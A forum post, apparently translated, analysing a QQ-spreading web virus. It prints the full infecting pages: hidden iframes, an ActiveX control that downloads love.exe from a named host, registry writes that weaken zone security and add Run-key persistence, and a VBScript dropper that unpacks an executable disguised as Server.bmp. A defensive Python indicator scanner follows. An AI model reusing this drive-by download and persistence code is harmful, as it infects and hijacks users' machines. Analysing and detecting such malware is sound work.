Analyze this virus (don't casually open the URLs in it)
Today the QQ group went haywire; someone sent this message:
http://nicex.126.com
Take a look. Photos I took recently~ just scanned and put online. See whether I've changed?
I clicked the link, and before long my QQ was sending this same message to the QQ group too. I knew I was infected...
Lots of people in the QQ group got infected...
I analyzed it and finally found the root cause; please take a look, everyone.
The web page contains the following two lines:
<iframe src="1.htm" width="0" height="0" frameborder="0"></iframe>
<iframe src="2.htm" width="0" height="0" frameborder="0"></iframe>
The content of 1.htm is as follows:
<HTML>
<HEAD>
<TITLE>aaa</TITLE>
</HEAD>
<BODY>
<OBJECT
classid="clsid:36CB6B28-FC08-4373-8F54-1A02E3C15B7D" codebase="http://yy20.nease.net/zcyh/images/WebDownLoadProj1.ocx#version=1,0,0,0"
width=1 height=1 align=center
hspace=0 vspace=0>
<param name="StrUrl" value="http://yy20.nease.net/zcyh/love.exe">
</OBJECT>
<iframe src="love.mht" width="0" height="0" frameborder="no" border="0" marginwidth="0" marginheight="0" scrolling="no">
</iframe>
</BODY></HTML>
It in turn includes love.mht, an encoded e-mail message containing an executable file:
Content-Type: audio/x-wav;
name="jieba.exe"
Content-Transfer-Encoding: base64
Content-ID: <Mud>
That file is too large to post here.
2.htm
<SCRIPT>
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function f(){
try
{
//ActiveX initialization
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
a1.createInstance();
FSO = a1.GetObject();
a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Net = a1.GetObject();
try
{
if (document.cookie.indexOf("Chg") == -1)
{
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\1004",0,"REG_DWORD");
var expdate = new Date((new Date()).getTime() + (1));
document.cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
}
}
catch(e)
{}
}
catch(e)
{}
}
function init()
{
setTimeout("f()", 1000);
}
init();
</SCRIPT>
<script language="javascript">
<!-- Begin
function opencolortext(){
window.open('3.htm','colortext','top=9999,left=9999,width=0,height=0')
}
setTimeout("opencolortext()",2000)
// End -->
</script>
It opens 3.htm, whose content is:
<HTML>
<HEAD>
<TITLE>网易广告</TITLE>
</HEAD>
<BODY>
<meta http-equiv=Content-Type content="text/html; charset=gb2312">
<SCRIPT language=javascript>
run_exe="<OBJECT ID=\"RUNIT\" WIDTH=0 HEIGHT=0 TYPE=\"application/x-oleobject\""
run_exe+="CODEBASE=\"love.exe#version=1,1,1,1\">"
run_exe+="<PARAM NAME=\"_Version\" value=\"65536\">"
run_exe+="</OBJECT>"
run_exe+="<HTML><H1> </H1></HTML>";
document.open();
document.clear();
document.writeln(run_exe);
document.close();
</SCRIPT>
<IMG SRC=Server.bmp width=0 height=0>
<SCRIPT SRC=Server.js></SCRIPT>
</BODY></HTML>
The Server.js it includes is as follows:
document.write('<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>');
function docsave()
{
a=document.applets[0];
a.setCLSID('{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}');
a.createInstance();
wsh=a.GetObject();
a.setCLSID('{0D43FE01-F093-11CF-8940-00A0C9054228}');
a.createInstance();
fso=a.GetObject();
var winsys=fso.GetSpecialFolder(1);
var vbs=winsys+'\\s.vbs';
wsh.RegWrite('HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\vbs','wscript '+'"'+vbs+'"');
wsh.RegWrite('HKCR\\.VBS\\','VBSFile');
var st=fso.CreateTextFile(vbs,true);
st.WriteLine('Option Explicit');
st.WriteLine('Dim FSO,WSH,CACHE,str');
st.WriteLine('Set FSO = CreateObject("Scripting.FileSystemObject")');
st.WriteLine('Set WSH = CreateObject("WScript.Shell")');
st.WriteLine('CACHE=wsh.RegRead("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\\Cache")');
st.WriteLine('wsh.RegDelete("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\vbs")');
st.WriteLine('wsh.RegWrite "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\tmp","tmp.exe"');
st.WriteLine('SearchBMPFile fso.GetFolder(CACHE),"Server[1].bmp"');
st.WriteLine('WScript.Quit()');
st.WriteLine('Function SearchBMPFile(Folder,fname)');
st.WriteLine(' Dim SubFolder,File,Lt,tmp,winsys');
st.WriteLine(' str=FSO.GetParentFolderName(folder) & "\\" & folder.name & "\\" & fname');
st.WriteLine(' if FSO.FileExists(str) then');
st.WriteLine(' tmp=fso.GetSpecialFolder(2) & "\\"');
st.WriteLine(' winsys=fso.GetSpecialFolder(1) & "\\"');
st.WriteLine(' set File=FSO.GetFile(str)');
st.WriteLine(' File.Copy(tmp & "tmp.dat")');
st.WriteLine(' File.Delete');
st.WriteLine(' set Lt=FSO.CreateTextFile(tmp & "tmp.in")');
st.WriteLine(' Lt.WriteLine("rbx")');
st.WriteLine(' Lt.WriteLine("3")');
st.WriteLine(' Lt.WriteLine("rcx")');
st.WriteLine(' Lt.WriteLine("5492")');
st.WriteLine(' Lt.WriteLine("w136")');
st.WriteLine(' Lt.WriteLine("q")');
st.WriteLine(' Lt.Close');
st.WriteLine(' WSH.Run "command /c debug " & tmp & "tmp.dat <" & tmp & "tmp.in >" & tmp & "tmp.out",false,6');
st.WriteLine(' On Error Resume Next ');
st.WriteLine(' FSO.GetFile(tmp & "tmp.dat").Copy(winsys & "tmp.exe")');
st.WriteLine(' FSO.GetFile(tmp & "tmp.dat").Delete');
st.WriteLine(' FSO.GetFile(tmp & "tmp.in").Delete');
st.WriteLine(' FSO.GetFile(tmp & "tmp.out").Delete');
st.WriteLine(' end if');
st.WriteLine(' If Folder.SubFolders.Count <> 0 Then');
st.WriteLine(' For Each SubFolder In Folder.SubFolders');
st.WriteLine(' SearchBMPFile SubFolder,fname');
st.WriteLine(' Next');
st.WriteLine(' End If');
st.WriteLine('End Function');
st.Close();
}
setTimeout('docsave()',1000);
I'm dizzy............. This virus is impressive; who can unravel its secrets?
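Below is an added defender-side example (my own code, not part of the original post or of the malware): a small scanner for the indicators that are visible in the quoted 1.htm, 2.htm and Server.js (zero-size iframes and windows, the com.ms.activeX.ActiveXComponent applet, the scripted CLSIDs, registry writes to the Run key and to the Internet-zone settings, and the debug.exe invocation), plus a check for the trick the generated s.vbs relies on: Server.bmp is a real executable with a 54-byte BMP header glued in front, and the debug script (rbx 3 / rcx 5492 / w136) writes 0x35492 bytes starting at memory offset 0x136, i.e. file offset 0x36, which drops exactly that header. The sample documents are constructed here from fragments quoted in the post; the download host is replaced by the placeholder example.invalid.

```python
"""Indicator scanner for the hidden-iframe / ActiveX / s.vbs dropper chain described in the post.
Added example, not the post's or the malware's code. All sample inputs below are constructed."""
import re

# CLSIDs scripted through the com.ms.activeX.ActiveXComponent applet in 2.htm and Server.js.
# The first three are the standard Windows scripting objects; the fourth is the downloader
# control referenced by 1.htm in the post.
KNOWN_CLSIDS = {
    "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B": "WScript.Shell",
    "0D43FE01-F093-11CF-8940-00A0C9054228": "Scripting.FileSystemObject",
    "F935DC26-1CF0-11D0-ADB9-00C04FD58A0B": "WScript.Network",
    "36CB6B28-FC08-4373-8F54-1A02E3C15B7D": "WebDownLoadProj1.ocx",
}
CLSID_RX = re.compile(r"\{?([0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12})\}?", re.I)

# Each indicator is matched against the raw page/script text, so registry paths appear with the
# doubled backslashes of a JS string literal; "\\+" tolerates one or more.
INDICATORS = [
    ("hidden-iframe", re.compile(r'<iframe[^>]*\b(width|height)\s*=\s*"?0\b', re.I)),
    ("hidden-window-open", re.compile(r"window\.open\([^)]*(width=0|height=0)", re.I)),
    ("ms-activex-applet", re.compile(r"com\.ms\.activeX\.ActiveXComponent", re.I)),
    ("run-key-persistence", re.compile(r"CurrentVersion\\+Run\\+", re.I)),
    ("zone-setting-write", re.compile(r"Internet Settings\\+Zones\\+3\\+", re.I)),
    ("exe-in-codebase", re.compile(r'codebase\s*=\s*\\?"[^"]*?\.(exe|ocx)', re.I)),
    ("debug-repack", re.compile(r"command /c debug", re.I)),
]


def scan_html(text):
    """Return the sorted indicator names found in one HTML or JS document."""
    hits = {name for name, rx in INDICATORS if rx.search(text)}
    for m in CLSID_RX.finditer(text):
        label = KNOWN_CLSIDS.get(m.group(1).upper())
        if label:
            hits.add("clsid:" + label)
    return sorted(hits)


# BITMAPFILEHEADER (14) + BITMAPINFOHEADER (40) = 54 = 0x36 bytes. debug.exe loads a file at
# CS:0100, so "w136" with BX:CX = 0x35492 writes the file back minus its first 0x36 bytes.
BMP_HEADER_LEN = 0x36


def is_bmp_wrapped_exe(data):
    """True when data carries a BMP signature but an MZ (DOS/PE) header right after the BMP header."""
    return data[:2] == b"BM" and data[BMP_HEADER_LEN:BMP_HEADER_LEN + 2] == b"MZ"


# Constructed samples, assembled from fragments quoted in the post (host replaced by a placeholder).
SAMPLE_1_HTM = r'''<OBJECT classid="clsid:36CB6B28-FC08-4373-8F54-1A02E3C15B7D"
codebase="http://example.invalid/WebDownLoadProj1.ocx#version=1,0,0,0" width=1 height=1>
<param name="StrUrl" value="http://example.invalid/love.exe"></OBJECT>
<iframe src="love.mht" width="0" height="0" frameborder="no"></iframe>'''

SAMPLE_2_HTM = r'''<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>
<SCRIPT>a1=document.applets[0];a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
Shl.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\1004",0,"REG_DWORD");
setTimeout("window.open('3.htm','x','top=9999,left=9999,width=0,height=0')",2000)</SCRIPT>'''

SAMPLE_SERVER_JS = r'''a.setCLSID('{0D43FE01-F093-11CF-8940-00A0C9054228}');fso=a.GetObject();
wsh.RegWrite('HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\vbs','wscript '+'"'+vbs+'"');
st.WriteLine(' WSH.Run "command /c debug " & tmp & "tmp.dat <" & tmp & "tmp.in >" & tmp & "tmp.out",false,6');'''

SAMPLE_BENIGN = '<html><body><img src="photo.jpg" width="640" height="480"></body></html>'

# Constructed byte strings: a BMP-headed file hiding an MZ header, and a plain BMP of the same size.
SAMPLE_BMP_PE = b"BM" + bytes(52) + b"MZ" + bytes(62)
SAMPLE_REAL_BMP = b"BM" + bytes(52) + bytes(64)

if __name__ == "__main__":
    for name, doc in (("1.htm", SAMPLE_1_HTM), ("2.htm", SAMPLE_2_HTM),
                      ("Server.js", SAMPLE_SERVER_JS), ("benign", SAMPLE_BENIGN)):
        print(name, scan_html(doc))
    print("Server.bmp-style polyglot:", is_bmp_wrapped_exe(SAMPLE_BMP_PE))
```

The same checks can be run over a browser cache directory: flag any .bmp whose bytes at offset 0x36 spell MZ, and any cached page that scripts WScript.Shell or Scripting.FileSystemObject from an applet, since neither has a legitimate reason to appear in a photo page.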